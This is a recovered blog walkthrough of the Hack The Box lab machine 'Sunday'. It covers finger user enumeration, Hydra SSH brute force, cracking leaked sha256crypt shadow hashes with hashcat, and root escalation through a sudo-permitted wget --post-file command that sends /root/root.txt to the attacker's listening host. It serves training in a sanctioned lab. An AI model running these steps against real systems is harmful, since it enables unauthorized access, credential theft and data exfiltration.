(recovered from old blog September, 30th 2018)

Pretty uncommon software usage to enter into this box (finger). It is a lookup program that will display login names, full name, and other details. Once list of system users have been grabed, Hydra will bruteforce ssh password as it only contains 6 characters.
Privileges escalation exploits the sudoers file authorization on wget binary with --post-file option.

ENUMERATION

Nmap

Start with the classic nmap scan for running services & their version.

root@kali-oscp:~# nmap -sC -sV -oA nmap-sunday 10.10.10.76
 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-04-30 17:25 WAT
        Nmap scan report for 10.10.10.76
        Host is up (0.018s latency).
        Not shown: 998 closed ports
        PORT    STATE SERVICE VERSION
        79/tcp  open  finger  Sun Solaris fingerd
        | finger: Login       Name               TTY         Idle    When    Where
        |_sammy    sammy                 pts/2       1:53 Mon 12:27  10.10.14.8          
        111/tcp open  rpcbind 2-4 (RPC #100000)
        Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Then a TCP SYN scan on the whole 1024+ TCP ports.

root@kali-oscp:~# nmap -sS 10.10.10.76 -p1024-59999 -T5
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-28 10:38 WAT
Warning: 10.10.10.76 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.59% done; ETC: 10:49 (0:08:51 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.017s latency).
Not shown: 31860 filtered ports, 27114 closed ports
PORT      STATE SERVICE
22022/tcp open  unknown
55159/tcp open  unknown

So we have: * OS: Solaris * Finger (tcp 79) with sammy user referenced * SSH (tcp 22022)

Finger Enumeration

As we have identified finger service, we can use Metasploit to enumerate potential system's users. This can be done with finger-user-enum from pentestmonkey too.

root@kali-oscp:~# msfconsole
msf > use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set RHOSTS 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set RPORTS 79
msf auxiliary(scanner/finger/finger_users) > exploit

Ok, so we have 2 interesting users: sammy and sunny.


SSH Bruteforce

I have first tried to launch a bruteforce attack using Hydra, but it take waaaaaaay too much time.
` root@kali-oscp:~# hydra -l sunny 4:10:aA 10.10.10.76 ssh`

4:10:aA, means
4: min chars
10: max charts
aA: all the alphabet minus & caps
... -> didn't get nothing & too long

In parrallel, I started a dictionnary attack with small words dictionary, and found the password for sunny user.
`root@kali-oscp:~# hydra -l sunny -P /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 10.10.10.76 ssh`

WORKED !!! => password is “sunday

Could have found it by myself, but using hydra is a good practice :-)
` root@kali-oscp:~# ssh sunny@10.10.10.76 -p 22022`

==> Connected


PRIVILEGES ESCALATION

From Sunny to Sammy

There isn't any user.txt file into the user folder, so it seems I need to jump to another one. Let's start some system Enumeration with LinEnum or "sudo -l" as this is where interesting informations are.

User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

uid=101(sammy) gid=10(staff) groups=10(staff)
uid=65535(sunny) gid=1(other) groups=1(other)

There is an interesting folder named /backup on top level. It contains 2 files, 1 not readable, and another one wth SHA-256 hash passwords for sammy & sunny users.

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup

sunny@sunday:/backup$ more .
agent22.backup: Permission denied
::::::::::::::                    
shadow.backup
::::::::::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Notes: StackOverflow question
If it starts with:
• $1$: it uses MD5.
• $5$: it uses SHA-256.
• $6$: it uses SHA-512.
• $2a$: it uses blowfish, not supported everywhere.
• Otherwise it uses DES.

So regarding hashcat documentation I will need to use the 7400 option:
7400 | sha256crypt $5$, SHA256 (Unix) | Operating Systems

Hashcat packages prerequisites

(not sure everybody need to do that, but I do)
For a fully working hashcat:

root@kali-oscp:~# apt install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
root@kali-oscp:~# apt install pocl-opencl-icd && apt install -y hashcat
root@kali-oscp:~# cat "$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445" >sammy.hash
root@kali-oscp:~# hashcat -m 7400 -a 0 sammy.hash /opt/wordlists/rockyou.txt --force 
... (6min19 later ...)
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

sunny@sunday:/backup$ ssh sammy@127.0.0.1
sammy@sunday:~$ cat Desktop/user.txt 
a3d94980**********************

From Sammy to root

Here too the sudo rights (sudo -l) have the interesting informations we are looking for.

Here too the sudo rights (sudo -l) have the interesting informations we are looking for.

Ok, let's parse the wget manual in a search of an option that will allow me to post a file

root@kali-oscp:~# wget --help|grep post
       --post-data=STRING          use the POST method; send STRING as the data
       --post-file=FILE            use the POST method; send contents of FILE

From my computer (it will serve port 8000 by default)

` python -m SimpleHTTPServer`

From Sammy shell

sammy@sunday:~$ sudo /usr/bin/wget --post-file=/root/root.txt http://10.10.14.25:8000`

And get the flag
fb40fab..........................................